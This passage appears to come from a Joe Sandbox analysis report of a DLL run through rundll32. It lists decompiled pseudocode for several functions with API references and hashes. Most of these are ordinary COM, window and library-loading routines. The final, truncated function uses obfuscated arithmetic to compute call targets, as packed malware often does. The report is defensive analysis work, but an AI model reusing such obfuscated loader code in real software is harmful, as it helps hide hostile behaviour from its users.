				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0x12db9c4b
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 1000E154
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493

Strings

, xrefs: 1000E32B

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID:
API String ID: 1522537378-3916222277
Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}

APIs

GetParent.USER32(?), ref: 10033BB6

Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524

GetWindowLongA.USER32 ref: 10033C57
UpdateWindow.USER32(?), ref: 10033C70

Strings

P, xrefs: 10033BF1

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}

APIs

__EH_prolog.LIBCMT ref: 10025CF1

Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5

Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5

LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50

Strings

DllGetClassObject, xrefs: 10025D4A

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
String ID: DllGetClassObject
API String ID: 821125782-1075368562
Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
PathFindExtensionA.SHLWAPI(?), ref: 10034C98
lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2

Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED

Strings

%s.dll, xrefs: 10034C9E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
String ID: %s.dll
API String ID: 4178508759-3668843792
Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}

0x100364c9
0x100364d1
0x10036530
0x10036530
0x100364ec
0x100364f0
0x100364f5
0x100364ff
0x1003650a
0x1003650b
0x10036516
0x10036523
0x10036523
0x10036516
0x10036525
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6

Strings

DllGetVersion, xrefs: 100364E0
COMCTL32.DLL, xrefs: 100364D5

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5

Uniqueness

Uniqueness Score: -1.00%

Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}

0x10029a98
0x10029a9d
0x10029aa0
0x10029ab5
0x10029ab9
0x10029ac2
0x10029ad1
0x10029ad9
0x10029adb
0x10029adb
0x10029ae5

APIs

GetWindowLongA.USER32 ref: 10029AA7
GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1

Strings

combobox, xrefs: 10029AC8

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91

Uniqueness

Uniqueness Score: -1.00%

Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = 0x10019589;
						 *0x1004f820 = 0x10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC

Strings

kernel32.dll, xrefs: 100195B7
InitializeCriticalSectionAndSpinCount, xrefs: 100195C6

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28

Uniqueness

Uniqueness Score: -1.00%

Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
